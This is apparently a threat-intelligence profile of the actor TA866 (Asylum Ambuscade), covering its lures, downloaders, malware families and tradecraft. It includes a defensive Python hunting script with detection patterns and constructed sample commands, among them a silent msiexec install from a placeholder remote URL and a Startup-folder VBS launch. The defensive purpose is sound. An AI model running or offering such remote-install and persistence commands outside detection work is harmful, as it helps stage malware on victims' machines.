TA866
TA866, also known as Asylum Ambuscade, is a threat actor tracked by Proofpoint that has conducted both financially motivated cybercrime and cyberespionage. Proofpoint began tracking TA866 as a distinct cluster in October 2022 under the activity name “Screentime”; reporting on Asylum Ambuscade dates back to at least March 2022, and its activity is assessed to have been ongoing since at least 2020.

In crimeware campaigns the group has targeted organizations primarily in the United States and Germany. It has also targeted European government staff involved in assisting Ukrainian refugees, as well as government entities and state-owned organizations in Europe, Central Asia, and Armenia. Reported victimology further includes bank customers, cryptocurrency traders, individuals, and SMBs, with more than 4,500 victims worldwide counted since January 2022.

Delivery is email-centric: malicious attachments or URLs, spearphishing, malspam, malvertising and malicious Google Ads, and traffic distribution systems. Multiple reports associate the actor with use of TAG-124 infrastructure, and other reporting links Asylum Ambuscade to a traffic distribution system Proofpoint called 404 TDS. Observed lures include invoice and job-related themes, thread hijacking, “check my presentation” themes, PDF attachments containing OneDrive links, Publisher files with malicious macros, malicious Excel attachments, JavaScript downloaders, and fake browser update or ClickFix-style flows delivered through compromised websites.

Observed infection chains include JavaScript downloaders that install MSI packages, VBS downloaders such as WasabiSeed, and first-stage downloaders written in Lua, Tcl, and VBS that are collectively referred to as SunSeed variants. WasabiSeed establishes persistence and then repeatedly polls command-and-control for additional MSI payloads.
A distinctive feature of TA866 activity is the “Screenshotter” payload, which captures and exfiltrates desktop screenshots so that operators can manually triage a victim before deciding whether to deliver follow-on tooling.

Post-exploitation tooling associated with TA866 includes AHK Bot, NODEBOT, Screenshotter, WasabiSeed, SunSeed, Rhadamanthys, tooling linked to the Resident backdoor, WarmCookie/BadSpace-linked activity, and malware with technical overlaps such as PS1Bot. AHK Bot is an AutoHotkey-based modular downloader/bot that can profile Active Directory domain membership and load additional payloads in memory, including Rhadamanthys Stealer. Its plugin ecosystem has included keylogging, screenshot capture, browser password theft, Active Directory and domain discovery, process and window listing, hVNC deployment, and downloading or launching additional payloads such as Cobalt Strike and Remote Utilities RAT. In March 2023 the actor introduced NODEBOT, a Node.js equivalent of AHK Bot assessed to be intended to evade security detections.

Proofpoint has linked TA866 to Rhadamanthys activity, including campaigns in which TA571 handled spam distribution and TA866 conducted post-exploitation. Cisco Talos reported notable development links between WarmCookie/BadSpace and the Resident backdoor, suggesting possible shared authorship associated with TA866, and separately reported links between WarmCookie and TA866. Talos further assessed that PS1Bot shares technical overlaps with AHK Bot, which had previously been used by Asylum Ambuscade/TA866.

Across these campaigns the actor’s tradecraft includes: scripting languages such as AutoHotkey, JavaScript, Lua, Python, VBS, and Node.js; MSI-based staging; persistence via startup shortcuts, scheduled tasks, and other mechanisms; repeated C2 polling keyed to host identifiers such as the C: drive volume serial number; in-memory execution of follow-on payloads; and use of compromised or shared infrastructure.
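The staging behaviours described above (a script host launching msiexec against a remote package, a script run from the user's Startup folder, and a downloader looping on a fixed sleep to poll one URL that carries a host identifier) are the kind a hunt team can check for in endpoint and proxy telemetry. The Python below is an added example written for this page; it is not tooling from Proofpoint, Talos, or the actor, and it does not reproduce any real TA866 indicator. The events, the hostnames (example.invalid, cdn.example.org), the URL paths, and the assumption that the volume serial appears as a bare 8-hex-digit path component are all constructed for illustration, and the field names only loosely mirror Sysmon event ID 1 and a web proxy log.

```python
"""Hunting heuristics for a TA866-style staging chain. Constructed sample data;
field names only loosely mirror Sysmon event ID 1 and a web proxy log."""
import re
import statistics
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Interpreters that the reporting associates with TA866 first-stage downloaders.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "node.exe",
                "autohotkey.exe", "autohotkeyu64.exe", "powershell.exe"}
# msiexec installing a package straight from http(s): "/i <url>" or "/package <url>".
REMOTE_MSI = re.compile(r'/(?:i|package)\s+"?(https?://[^\s"]+)', re.IGNORECASE)
# Per-user Startup folder, where a shortcut or script is run at logon.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
# Assumption for this example only: a 32-bit volume serial shows up as a bare
# 8-hex-digit path component in the polling URL.
SERIAL_TOKEN = re.compile(r"(?:^|/)[0-9a-f]{8}(?:/|$)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: dict) -> list[str]:
    """Return every heuristic a single process-creation event trips."""
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmd = ev["command_line"]
    findings = []
    m = REMOTE_MSI.search(cmd)
    if image == "msiexec.exe" and m:
        findings.append(f"remote MSI install from {urlparse(m.group(1)).netloc}")
        if parent in SCRIPT_HOSTS:
            findings.append(f"msiexec spawned by script host {parent}")
    if image in SCRIPT_HOSTS and STARTUP_DIR.search(cmd):
        findings.append(f"{image} running a file from the user Startup folder")
    return findings


def periodic_polling(requests, min_hits: int = 5, max_jitter: float = 0.15) -> dict:
    """Group (timestamp, host, path) requests by destination and flag groups whose
    inter-request gaps have a coefficient of variation <= max_jitter: the shape of
    a downloader looping on a fixed sleep. Also notes a serial-shaped path token."""
    by_dest = {}
    for ts, host, path in requests:
        by_dest.setdefault((host, path), []).append(ts)
    flagged = {}
    for dest, times in by_dest.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            flagged[dest] = {"interval_s": round(mean),
                             "serial_shaped_path": bool(SERIAL_TOKEN.search(dest[1]))}
    return flagged


# --- constructed sample telemetry (not real events) -------------------------
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "msiexec.exe /i https://example.invalid/pkg/5A3C0F1E /qn"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" '
                     r'"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"'},
    {"image": r"C:\Windows\System32\msiexec.exe",      # benign local install
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Users\u\Downloads\7z2301-x64.msi"'},
]

T0 = datetime(2024, 1, 15, 9, 0, 0)
PROXY_LOG = (
    # one destination hit every ~60 s with a second or two of drift
    [(T0 + timedelta(seconds=60 * i + (i % 3) - 1), "example.invalid", "/pkg/5A3C0F1E")
     for i in range(8)]
    # bursty, human-driven traffic to a CDN path
    + [(T0 + timedelta(seconds=s), "cdn.example.org", "/lib/jquery.js")
       for s in (3, 41, 42, 300, 301, 1800, 1802)]
)

if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        print(basename(ev["image"]), "->", check_process_event(ev) or "clean")
    for dest, info in periodic_polling(PROXY_LOG).items():
        print("periodic polling:", dest, info)
```

The thresholds (min_hits, max_jitter) are starting points, not tuned values. Fixed-interval polling also describes legitimate updaters, so treat the beacon heuristic as a triage signal to be paired with the process findings (script host parent, remote MSI source, Startup-folder execution) rather than as a detection on its own.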
In espionage operations, TA866 used spearphishing with malicious Excel attachments and, in June 2022, exploited Follina (CVE-2022-30190). Reported espionage objectives included theft of confidential information and webmail credentials from official government webmail portals. TA866 is also reported as one of multiple downstream users of shared initial access infrastructure, including KongTuke and TAG-124, alongside other cybercriminal and ransomware actors. Overall, the reporting consistently characterizes TA866/Asylum Ambuscade as a primarily crimeware-focused actor that also conducts periodic cyberespionage operations.
Tradecraft
11 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
6 malware families attributed to this actor across reporting.
1 additional family tracked in Mallory.
Observables
43 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
15 sources tracked across advisories, community write-ups, and news.
Referenced as an APT customer of KongTuke's infection distribution service.
Named as a threat actor/activity cluster associated with use of TAG-124 shared traffic distribution infrastructure, per Recorded Future; the source provides no additional operational details.
Referenced as a named threat actor that has leveraged KongTuke/TAG-124 infrastructure for follow-on malware delivery.
Referenced as an activity cluster that has leveraged KongTuke/TAG-124 infrastructure for follow-on malware delivery after initial access/traffic redirection.